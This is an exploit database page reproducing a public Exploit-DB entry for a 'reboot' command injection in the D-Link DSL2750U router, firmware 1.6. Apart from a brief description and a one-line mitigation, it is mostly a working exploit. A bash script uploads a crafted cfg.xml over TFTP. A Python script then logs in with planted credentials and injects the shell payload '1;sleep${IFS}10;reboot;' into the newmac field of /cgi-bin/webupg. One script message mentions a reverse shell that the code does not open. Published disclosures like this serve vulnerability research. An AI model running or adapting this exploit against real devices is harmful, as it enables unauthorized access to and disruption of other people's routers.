Dlink DSL2750U - 'Reboot' Command Injection

vendor:

DSL2750U

by:

Mohammed Hadi (HadiMed)

8,8

CVSS

HIGH

Command Injection

CWE

Product Name: DSL2750U

Affected Version From: 1.6

Affected Version To: 1.6

Patch Exists: YES

Related CWE: N/A

CPE: h:dlink:dsl2750u

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2021

Dlink DSL2750U – ‘Reboot’ Command Injection

A vulnerability in the Dlink DSL2750U router version 1.6 allows an attacker to inject a malicious reboot command. This is possible due to the router's tftp server accepting the cfg.xml file blindly. An attacker can craft a cfg.xml file with a malicious username and password, and then send it to the router via tftp. Once the router has accepted the file, the attacker can then send a POST request with the malicious reboot command, using the malicious username and password, and the sessionid extracted from the previous request. This will cause the router to reboot, allowing the attacker to gain access.

Mitigation:

Ensure that the router is running the latest version of the firmware, and that all security patches are applied.

Source

Exploit-DB raw data:

# Exploit Title: Dlink DSL2750U - 'Reboot' Command Injection
# Date: 17-06-2021
# Exploit Author: Mohammed Hadi (HadiMed)
# Vendor Homepage: https://me.dlink.com/consumer
# Software Link: https://dlinkmea.com/index.php/product/details?det=c0lvN0JoeVVhSXh4TVhjTnd1OUpUUT09 Version: ME_1.16
# Tested on: firmware GAN9.ET235B-B-DL-DSL2750U-R5B028-ME.EN_2T2R*
# https://github.com/HadiMed/firmware-analysis/tree/main/DSL-2750U%20(firmware%20version%201.6) 

### 

#!/bin/bash

# Exploit by HadiMed 

# Takes advantage of the tftp server that accepts the cfg file blindly 
echo -ne "\n"
echo "Exploiting Dlink DSL-2750u version 1.6"
echo -ne "\n\n"

# Sending the payload 
echo -ne "binary\nput cfg.xml\nquit" | tftp 192.168.1.1
echo -ne "\n"

echo "File uploaded Successfully"
echo "Waiting for router to restart"

sleep 180 # approximate time for router to restart 

python3 exploit.py

###

import requests 

# HTTP request looks like this 
'''
POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.1.1
Content-Length: 175
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.1/cgi-bin/webproc
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: sessionid=deadbeef; language=en_us; sys_UserName=user; sessionid=634cdf91
Connection: close

getpage=html%2Findex.html&errorpage=html%2Fmain.html&var%3Amenu=setup&var%3Apage=wizard&obj-action=auth&%3Ausername=user&%3Apassword=user&%3Aaction=login&%3Asessionid=634cdf91 
'''

# 1 Getting a session id 

# password and username crafted by me on the cfg.xml file 

username = "pwned"
password= "pwned"


# acually the client set the sessionid in condition that the password and username are correct

Cookie="sessionid=deadbeef; language=en_us; sys_UserName=pwned; sessionid=deadbeef"
Contentty="application/x-www-form-urlencoded"
Referer="http://192.168.1.1/cgi-bin/webproc"
Contentlen="175" 

# Sending first request to set our session id 
response = requests.post("http://192.168.1.1/cgi-bin/webproc",
	headers={"Cookie":Cookie , "Content-Type":Contentty , "Referer":Referer , "Content-Length":Contentlen }
,	
	data={	"getpage":"html/index.html",
	      	"errorpage":"html/main.html",
	      	"var:menu" : "setup",
		"var:page":"wizard",
		"obj-action":"auth",
		":username":username,
		":password":password,
		":action":"login",
		":sessionid":"deadbeef"
}
	)


Referer = "http://192.168.1.1/cgi-bin/webupg"

name = "mac"
cmd = "1;sleep${IFS}10;reboot;"

Contentlen = str(len(name+cmd)+10)

if response.status_code==302:
	print("got sessionid=deadbeef !\n waiting for the reverse shell ...") 

# access cgi-bin/webupg
try :
	response = requests.post("http://192.168.1.1/cgi-bin/webupg",
        headers={"Cookie":Cookie , "Content-Type":Contentty , "Referer":Referer , "Content-Length":Contentlen }
        ,data = {"name":name , "newmac":cmd} , timeout=0.0000000001

)

except requests.exceptions.Timeout :

	print("done router will restart in 20 sec") 	

print("Device restarted!")